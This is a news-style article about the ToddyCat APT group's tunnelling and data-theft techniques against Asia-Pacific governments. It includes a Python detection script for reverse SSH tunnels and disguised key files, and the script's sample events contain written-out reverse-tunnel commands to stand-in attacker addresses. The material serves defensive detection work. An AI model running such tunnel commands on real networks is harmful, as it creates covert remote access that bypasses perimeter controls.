ToddyCat: Unveiling the Stealthy APT Group Targeting Asia-Pacific Governments


A new report from Kaspersky Labs reveals a sophisticated toolkit used by the advanced persistent threat (APT) group, “ToddyCat,” to steal massive amounts of sensitive data and maintain control over compromised systems. The group primarily targets governmental organizations throughout the Asia-Pacific region.

ToddyCat's operations hinge on obtaining privileged user credentials, which then enable the deployment of an arsenal of tools. Using PsExec and Impacket, the attackers connect to other hosts in the compromised network, copy their tooling over, and execute it remotely. The sophistication and scale of these attacks point to a well-orchestrated effort to automate data theft, ensuring a steady stream of valuable intelligence.

Diagram of SSH tunnel creation | Image: Kaspersky Labs

The cornerstone of ToddyCat's strategy is maintaining undetected access. Using the OpenSSH suite for Windows, the group establishes multiple reverse SSH tunnels: the connection is initiated from inside the victim network towards an attacker-controlled host, so it passes through the perimeter as ordinary outbound traffic while giving the operators an inbound path back in. Keeping several such tunnels open ensures persistent access even if some are discovered and shut down. SoftEther VPN, another tool favored by the group, adds a second, independent channel into the network, one that is harder to trace and dismantle than a single tunnel.

ToddyCat's expertise extends to disguising their tools and operations. By renaming executable files and using scripts that quietly adjust file and system permissions, they effectively camouflage their presence. The files the SSH connections depend on, for instance, are stored under common data-file extensions such as .ini and .dat, so they do not stand out to security personnel reviewing the file system.
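The two techniques above (reverse SSH tunnels and key files hidden behind data-file extensions) leave a recognisable footprint in process-creation telemetry. The following detection logic is an added example written for this article, not code from Kaspersky or from the ToddyCat toolset. It assumes Sysmon-style event fields (`Image`, `OriginalFileName`, `CommandLine`), standard OpenSSH client syntax (`-R` for a reverse forward, `-i` for an identity file), and the `.ini`/`.dat` extensions the article mentions; the sample events are constructed for the example and are not taken from the report.

```python
import ntpath
import shlex
from typing import Dict, List, Tuple

# Extensions the article says ToddyCat used to disguise SSH key/config files.
DISGUISE_EXTS = {".ini", ".dat"}

# Constructed sample process-creation events (simplified Sysmon Event ID 1 fields).
# These are made up for this example; they are not taken from the Kaspersky report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # reverse tunnel exposing RDP, key disguised as an .ini file
        "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
        "OriginalFileName": "ssh.exe",
        "CommandLine": r"ssh.exe -N -R 44444:localhost:3389 -i C:\ProgramData\conf.ini -o StrictHostKeyChecking=no user@203.0.113.10",
    },
    {   # ssh.exe renamed to svc.exe, -R glued to its argument, key disguised as .dat
        "Image": r"C:\Users\Public\svc.exe",
        "OriginalFileName": "ssh.exe",
        "CommandLine": r"svc.exe -N -R55555:127.0.0.1:22 -i C:\Windows\Temp\data.dat ops@198.51.100.7",
    },
    {   # benign: ordinary interactive ssh with a normally named key
        "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
        "OriginalFileName": "ssh.exe",
        "CommandLine": r"ssh.exe -i C:\Users\admin\.ssh\id_ed25519 admin@git.example.internal",
    },
    {   # benign: unrelated process opening an .ini file
        "Image": r"C:\Windows\System32\notepad.exe",
        "OriginalFileName": "NOTEPAD.EXE",
        "CommandLine": r"notepad.exe C:\Users\admin\notes.ini",
    },
]


def parse_ssh_args(cmdline: str) -> Dict[str, List[str]]:
    """Extract -R (reverse forward) specs and -i (identity file) paths from an
    OpenSSH client command line. Handles both '-R spec' and '-Rspec' forms.
    posix=False keeps Windows backslashes intact; quotes are stripped afterwards."""
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    found: Dict[str, List[str]] = {"-R": [], "-i": []}
    i = 1  # skip argv[0]
    while i < len(tokens):
        tok = tokens[i]
        if tok in found and i + 1 < len(tokens):
            found[tok].append(tokens[i + 1])
            i += 2
            continue
        if len(tok) > 2 and tok[:2] in found:
            found[tok[:2]].append(tok[2:])
        i += 1
    return found


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons this event looks like a ToddyCat-style tunnel setup.
    An empty list means nothing suspicious was found."""
    reasons: List[str] = []
    image_name = ntpath.basename(ev.get("Image", "")).lower()
    original = ev.get("OriginalFileName", "").lower()
    # OriginalFileName comes from the PE version resource, so it survives renaming.
    if original != "ssh.exe" and image_name != "ssh.exe":
        return reasons
    if original == "ssh.exe" and image_name != "ssh.exe":
        reasons.append(f"ssh.exe renamed to {image_name}")
    args = parse_ssh_args(ev.get("CommandLine", ""))
    for spec in args["-R"]:
        reasons.append(f"reverse tunnel requested: -R {spec}")
    for key in args["-i"]:
        if ntpath.splitext(key)[1].lower() in DISGUISE_EXTS:
            reasons.append(f"identity file disguised as data file: {key}")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run analyze_event over a batch and keep only the events with findings."""
    hits = []
    for idx, ev in enumerate(events):
        reasons = analyze_event(ev)
        if reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

Matching on `OriginalFileName` rather than the on-disk name is what catches the renamed binary in the second sample; a rule keyed only on `ssh.exe` in the path would miss it. In production the `-R` check is best paired with a network-side rule for long-lived outbound SSH sessions from hosts that have no business reason to open them.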

Beyond maintaining access, ToddyCat is adept at large-scale data harvesting. The group uses tools like cuthead for systematic data collection and WAExp for pilfering WhatsApp data, demonstrating their capability to extract a wide array of information from compromised systems. This includes sensitive governmental communications and documents, which could have significant geopolitical implications.

In response to the persistent threats posed by groups like ToddyCat, Kaspersky Labs recommends several proactive security measures. Organizations are urged to restrict the use of remote access and tunnelling tools to the hosts and administrators that genuinely need them, rigorously monitor network traffic for the long-lived outbound connections such tunnels produce, and employ detection logic capable of identifying and shutting down these covert channels. Additionally, raising user awareness about password security and the risks of storing credentials and session data in browsers is crucial.